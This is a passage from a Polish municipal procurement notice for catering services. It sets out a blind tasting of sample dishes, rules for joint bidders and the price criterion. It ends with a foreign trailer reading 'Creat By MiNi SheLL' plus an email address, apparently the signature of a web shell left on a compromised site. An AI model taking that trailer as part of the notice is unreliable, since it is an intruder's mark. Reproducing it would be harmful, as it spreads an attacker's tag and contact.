2. Termin wykonania zamówienia publicznego. Termin zakończenia zamówienia: do dnia 31.12.2011r. lub do wyczerpania środków budżetowych do wysokości których będzie podpisana umowa.
3. Próbki oferowanych potraw.
3.1. Wykonawca biorący udział w postępowaniu winien przygotować do degustacji następujące próbki potraw:
3.1.1. Gulasz po węgiersku - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ; 3.1.2. Pieczeń wołowa w sosie grzybowym, kluski śląskie, surówka z kapusty czerwonej - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ; 3.1.3. Zupa krem borowikowa - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ; 3.1.4. Kanapki bankietowe na pieczywie razowym z serem, z szynką, warzywami - 6 szt. zgodne z gramaturą określoną w menu z pkt. 3.3.3. SIWZ;
3.2. Próbki potraw należy dostarczyć w dniu otwarcia ofert na Salę Narad nr 1 (I piętro) w Urzędzie Miejskim w godzinach od 11:00 do 11:30. Wykonawcom przed wejściem na salę zostaną przyporządkowane numery. Numeracja próbek jest niezależna od numeracji ofert. Każdy z wykonawców otrzyma dwie kartki z numerem, jedną z nich należy oznakować próbkę, drugą należy zachować do czasu otwarcia ofert.  Każdy z wykonawców będzie miał możliwość wyeksponowania we wskazanym miejscu potraw stanowiących próbki. Potrawy należy podać na zastawie Wykonawcy. Wskazane jest by zastawa użyta do podania potraw nie sugerowała nazwy Wykonawcy. Wykonawca winien do godziny 11:30 pozostawić potrawy na wyznaczonym miejscu i oznaczyć je numerem. Ponieważ próbki składane do postępowania podlegają ocenie w ramach kryterium oceny ofert: Jakość świadczenia usług cateringowych, nie ma możliwości uzupełnienia próbek w terminie późniejszym na podstawie art. 26 ust. 3 Ustawy, gdyż naruszałoby to sformułowaną w art. 7 Ustawy zasadę równego traktowania i uczciwej konkurencji.
3.3. W godz. od 11:30 do 12:15 Komisja dokona oceny próbek zgodnie z zasadami określonymi w pkt. 24.2.3. SIWZ. Przyporządkowanie numerów nie będzie znane Komisji w momencie dokonywania oceny próbek. Próbki potraw zostaną przez Zamawiającego sfotografowane w celach dokumentacyjnych. Po dokonaniu oceny próbek przez komisję, Wykonawcy będą mogli zabrać zastawę oraz pozostałe przedmioty, które zostały wykorzystane do przygotowania i podania potraw.
3.4. Przed otwarciem ofert o godzinie 12:45 odbędzie się na Sali Narad nr 1 spotkanie z Wykonawcami, którzy dostarczyli próbki. Wykonawcy zostaną poinformowani o łącznej punktacji przyznanej oznaczonym numerami próbkom potraw. Po ogłoszeniu punktacji zostanie ustalone przyporządkowanie próbek Wykonawcom, a następnie o  godzinie 13:00 zostanie dokonane otwarcie ofert zgodnie z zasadami określonymi w  pkt. 20 SIWZ.
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
4.1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
4.2.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.1.2. i 9.2. SIWZ przez  każdego z  nich odrębnie.
4.3.	Wykaz i dokumenty potwierdzające należyte wykonanie usług wymienione w  pkt. 9.1.3. SIWZ Wykonawcy składają wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ i formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ, winny być podpisane przez uprawnionych przedstawicieli Wykonawców.
4.4.	Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
4.5. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
5. Przez kryterium:Cena należy rozumieć: Sumę cen jednostkowych brutto.
6.Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com